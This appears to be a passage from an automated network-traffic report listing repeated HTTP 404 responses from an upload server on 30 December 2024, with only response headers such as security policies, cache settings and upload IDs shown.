                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ZL7jZETWOdw9ez3hWjVKzzAlrLiB-a_o-UFF3R9T2Rwi5xVK7KV8cLKPVjpgWCJBbaBCLqVoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:21 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-X_aDOfXI0bC16acdRcR0Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5XXbI-vE8QyrFx0mNffaOVDhpDMQ93tGeLEpt8P0RNfBbVSsZP4QIlP400FUznQcM3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:22 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-RWIuIJr2itQKpTqFlt0DRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Tfmin-xJHMPsXKvU440hGWC3EKIfnkTfHdVWT42uKnOo-Pfl4710PAJaB2xAbqUM5zKbzwyQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:22 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xR1V8mR_Ph1vVYEWdBRfNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5KeSs4HnPBWgOkUlGJtnBsPYzT91RVoCvEFgC4i2OJognPef2dO63njyeUbNVs0acXContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:23 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-d0jFUUaeKHrMltp4L215pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Zq8sTeMBuEhW9JUqnl0HI1zzCMSCevXuS2Zf1e0ZMoJ7nvvt59BfNaPnDWZd2y4-zContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:23 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-yC2sheh8fLVQg13vR2614Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4rBfxh_2NjrexE68ed_ywLpzGraTm7-5ay0X3TFOxkY2psU7uHBbxOxi8AzkQrnjfHZMtBiusContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:25 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ty3dGGW3iXHtJn3rKJywzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6NAdVvlnTiwM_L4fBg5PuYVmpGC33E-AAMivc4XE7BldObXMtrIXfBsfc0cGVRWGYkVqqKr7sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:26 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-dkRAlg9JvKozKWcv38QnjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7SMVOMk_A5U6vF4up5ioHeyx-W4FaELMvnUZJvOBdc7LA8y7CSbJUX0QfEr28DuC12Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:26 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ou2H1DRG1L2kuRU1ll2jdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4OzBk4dpquZlpfSpwAbFy05Zb-MzvoQAbViwLtbQUFVbYzncyVmFCTD8OJQMrWA_bkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:27 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-UyqLuZKg2-EH53C1rRO9FA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5gW68JiHyKqt-DQkT8jRhES9JdVAbKZSuObf5DLyuq6yJX7lVJ3GO_5nU5JRNHo-LhContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:28 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4AU1pTYZl405Zu85GtCLDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7hJMt4oSp2IxZFnYnEtaRuxCb5r-4375Tq40RwTgXsDV3Hub6upU6SlNqkR7bS_YAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:31 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_JcuSFna3hBFD-RJiBhzJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5UUxZqRUPDo_pyCXd14vXOoJJVgQCgWSjlpHRiBvt4fYZstKPd0nZ8T0E5L-8DuAKkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:31 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-dbZHivfAaM3-m_kwhVXF3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7WTuj94rufFDqZtwG7pxZoPH3_rR-ldvJA6TcgU5y2S8yRp6CpMZZNerOCl1lR-3-iEv1UpDEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:32 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-8PMB9QibpD4S_cZPFcA4Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6WLcS0ld8Wbl-pvK-Of99jMkw-S8PkJqPMC-fJgoCWFNBnzpaPpGMnw7c9ZGc6Z9JTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:33 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-WF6MBzeexB25fcpvlSVXSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC54S44jTpunVyL1JvdIZcMCDlQ96wc37R4z45DYbxl2xjECfjVKCLBLjEpExgy92w3KContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:34 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_ke4b_5EzedudC5u9u1axg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ibPmzOI1Lii0TxKIZx3GBxaI2KXhUOn74MPldB8H2GXMefFtQh8NytzOidJH7jkGTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:34 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-xpP2zZ-6zwRAmLyEzrh1CA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC50k40grudO0XMsDfqpLCiiqFXU8d3mLVHX4IKPEBh9vlC7ehNdzkLwSz7Lo0YEXWGueZEhfTgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:35 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-SRHZKpJusfQ3tOce-mYiEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4kgWIAoXPJEafRG-rBzAmLgMy_lUI4GLoGRNz-3itIi6_xEVeSd6WfscHCY21D7MClQcT4HOYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-BflQQ2cwIyt5scdNY40m-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4fNsXOw2LOxqHCNCOgyYfGaUahACuTzxpUCpRf2e94KO4Z3AyfJ-uwZ7_ao_MEKJ95Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:37 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-y5SqVzsoxvKSwlq2B5I9vg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6qIAKt0tAYw7GvBkbLPvtjEtuMy-DUbUU4RjFzBqdWjoDcyLViv0R1Nv1fz-H8lgHdh7ilCMcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:37 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-ZOAkT6HPPce_1-6RJ2easQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
